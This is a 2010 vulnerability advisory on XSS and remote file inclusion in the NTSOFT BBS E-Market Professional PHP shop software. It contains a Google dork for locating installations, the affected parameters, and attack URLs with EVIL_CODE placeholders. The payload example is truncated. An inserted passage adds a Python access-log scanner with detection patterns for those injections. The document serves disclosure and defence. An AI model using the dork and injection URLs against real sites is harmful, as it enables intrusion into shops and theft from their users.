
NTSOFT BBS E-Market Professional = XSS / Remote Execution Code







Dear Team,

> You can find attached the file, where I have found several bugs on this
> application.
>
> Thank you so much!
>
>
> Ing. Ivan Javier Sanchez
>      Nullcode Project
>
> Email: Ivan.Sanchez@nullcode.com.ar 
> Web Site: http://www.nullcode.com.ar 
> http://ar.linkedin.com/in/nullcode 
>



+================================================================================================+
+                 NTSOFT BBS E-Market Professional  & XSS and Remote Execution Evil code         +
+================================================================================================+


Author(s): Ivan Sanchez 

Product:   NTSOFT, All Right Reserved.

Vendor Overview: NTSOFT. (Korean ecommerce application)

Vendor Homepage: http://www.nt.co.kr/ 



Date: 03/07/2010


"most of all Korean sites that handle e-shop, e-banking, ... use this software"


Description:
------------

BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. 
The issue presents itself due to improper validation of user-supplied data. 




During 2009, I reported some bugs:
----------------------------------

http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt 

http://www.securityfocus.com/bid/35893 

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152 

http://xforce.iss.net/xforce/xfdb/52157 

http://secunia.com/advisories/26117 

http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html 



GOOGLE DORKS:
------------

intext: "NTSOFT All rights reserved"



Parameters affected:
--------------------

2010:

pageurl=   evil.js
co_no=     evil.js
b_temcode= evil.js



2009:

page= evil.js
bt_code= evil.js
b_no= evil.js






Evil Code to put:
-----------------

Example: "> 




Example URLs affected:
---------------------


2009:

http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code 



2010:

http://TARGET/becommunity/community/index.php?pageurl=EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE&co_no=105580


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODE&page=7&flg=3&co_no=105580
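As a defender-side check added here (it is not part of the advisory and not NTSOFT code), the following Python scans web-server access-log lines for requests to the index.php path above whose advisory-listed parameters carry HTML metacharacters, script references or absolute URLs; the log lines, client addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request parameters the advisory lists as affected (2009 and 2010 sets).
WATCHED_PARAMS = {"pageurl", "co_no", "b_temcode", "page", "bt_code", "b_no"}
TARGET_PATH = "/becommunity/community/index.php"
# Fragments that never belong in a board id, page number or template code.
SUSPICIOUS = re.compile(r'[<>"\']|javascript:|\.js\b|https?://', re.IGNORECASE)
# Common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')

def suspicious_params(target):
    """Return {param: decoded value} for watched parameters carrying markup or URLs."""
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return {}
    hits = {}
    # parse_qsl percent-decodes values (so %3Cscript%3E is seen as <script>) and
    # yields repeated names separately; the advisory's URLs pass co_no twice.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and SUSPICIOUS.search(value):
            hits[name] = value
    return hits

def scan_log(lines):
    """Return (client ip, timestamp, hits) for each request that trips the check."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("ts"), hits))
    return findings

# Constructed sample access-log lines; none are taken from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2010:09:03:31 +0900] "GET /becommunity/community/index.php'
    '?pageurl=board&mode=view&b_no=434&bt_code=17&page=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jul/2010:09:04:02 +0900] "GET /becommunity/community/index.php'
    '?pageurl=%22%3E%3Cscript%3E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jul/2010:09:04:40 +0900] "GET /becommunity/community/index.php'
    '?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=3'
    '&co_no=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Jul/2010:09:05:10 +0900] "GET /other.php?pageurl=%3Cscript%3E HTTP/1.1" 404 210',
]
```

Running scan_log(SAMPLE_LOG) flags only the second and third lines: the first carries plain ids and the last targets a different script path.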





Thank you so much! Ivan


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! 

+================================================================================================+
+                  NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code         +
+================================================================================================+


